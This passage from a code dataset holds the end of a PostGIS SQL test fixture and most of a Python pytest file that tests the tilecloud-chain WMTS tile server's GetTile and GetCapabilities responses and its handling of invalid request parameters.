'point','the_geom',21781,'POINT',2);\n\nCREATE 
TABLE tests.line (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 'line','the_geom',21781,'LINESTRING',2);\n\nCREATE TABLE tests.polygon (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 'polygon','the_geom',21781,'POLYGON',2);\n\n\nINSERT INTO tests.point VALUES (0, 'point1', ST_GeomFromText('POINT (600000 200000)', 21781));\nINSERT INTO tests.point VALUES (1, 'point2', ST_GeomFromText('POINT (530000 150000)', 21781));\n\nINSERT INTO tests.line VALUES (0, 'line1', ST_GeomFromText('LINESTRING (600000 200000,530000 150000)', 21781));\n\nINSERT INTO tests.polygon VALUES (0, 'polygon1', ST_GeomFromText('POLYGON ((600000 200000,600000 150000,530000 150000, 530000 200000, 600000 200000))', 21781));\n" }, { "alpha_fraction": 0.5155675411224365, "alphanum_fraction": 0.5524795651435852, "avg_line_length": 35.618133544921875, "blob_id": "6e2ffe6982b6b4cde7de6572f9003babf0133fb5", "content_id": "e5f8f41fe51eeb8317256aca016474f337858f2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39987, "license_type": "permissive", "max_line_length": 110, "num_lines": 1092, "path": "/tilecloud_chain/tests/test_serve.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nimport pytest\nfrom pyramid.httpexceptions import HTTPBadRequest, HTTPNoContent\nfrom pyramid.testing import DummyRequest\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller, generate, server\nfrom tilecloud_chain.server import PyramidView, app_factory\nfrom tilecloud_chain.tests import CompareCase\n\nCAPABILITIES = (\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <InfoFormat></InfoFormat>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" 
resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash/default/{DATE}/\"\"\"\n r\"\"\"{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\"\n)\n\n\nclass TestServe(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_serve_kvp(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[\n (\"point_hash/default/2012/swissgrid_5/1/11/14.png\"),\n (\"point_hash/default/2012/swissgrid_5/1/15/8.png\"),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-nosns.yaml\",\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetTile\",\n 
\"Format\": \"image/png\",\n \"Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"11\",\n \"TileCol\": \"14\",\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.params[\"TileRow\"] = \"12\"\n assert isinstance(serve(), HTTPNoContent)\n\n request.params[\"TileRow\"] = \"11\"\n request.params[\"Service\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Service\"] = \"WMTS\"\n request.params[\"Request\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Request\"] = \"GetTile\"\n request.params[\"Version\"] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Version\"] = \"1.0.0\"\n request.params[\"Format\"] = \"image/jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Format\"] = \"image/png\"\n request.params[\"Layer\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Layer\"] = \"point_hash\"\n request.params[\"Style\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Style\"] = \"default\"\n request.params[\"TileMatrixSet\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"TileMatrixSet\"] = \"swissgrid_5\"\n del request.params[\"Service\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetCapabilities\",\n }\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n regex=True,\n expected=r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n <Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n 
<Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/all/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point/default/\"\"\"\n 
\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_error</ows:Title>\n <ows:Identifier>point_error</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_error/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n 
<Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n 
<TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n </Capabilities>\"\"\",\n )\n\n log_capture.check()\n\n def test_mbtiles_rest(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-serve.yaml\"\n \" -l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/mbtiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.mbtiles\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.matchdict = {\n \"path\": [\"wmts\", \"1.0.0\", \"point_hash\", \"default\", \"2012\", \"swissgrid_5\", \"1\", \"11\", \"14.png\"]\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.matchdict[\"path\"][7] = \"12\"\n response = serve()\n assert isinstance(response, HTTPNoContent)\n assert response.headers[\"Cache-Control\"] == \"max-age=28800\"\n\n request.matchdict[\"path\"][7] = \"11\"\n request.matchdict[\"path\"][1] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][1] = \"1.0.0\"\n request.matchdict[\"path\"][8] = \"14.jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][8] = \"14.png\"\n request.matchdict[\"path\"][2] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][2] = \"point_hash\"\n request.matchdict[\"path\"][3] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][3] = \"default\"\n request.matchdict[\"path\"][5] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"point_hash\", \"default\", \"swissgrid_5\", \"1\", \"14\", \"11.png\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], 
\"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test bsddb\")\n def test_bsddb_rest(self):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-bsddb.yaml\"\n \" -l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/bsddb/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.bsddb\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-bsddb.yaml\",\n }\n request.matchdict = {\n \"path\": [\"wmts\", \"1.0.0\", \"point_hash\", \"default\", \"2012\", \"swissgrid_5\", \"1\", \"11\", \"14.png\"]\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n 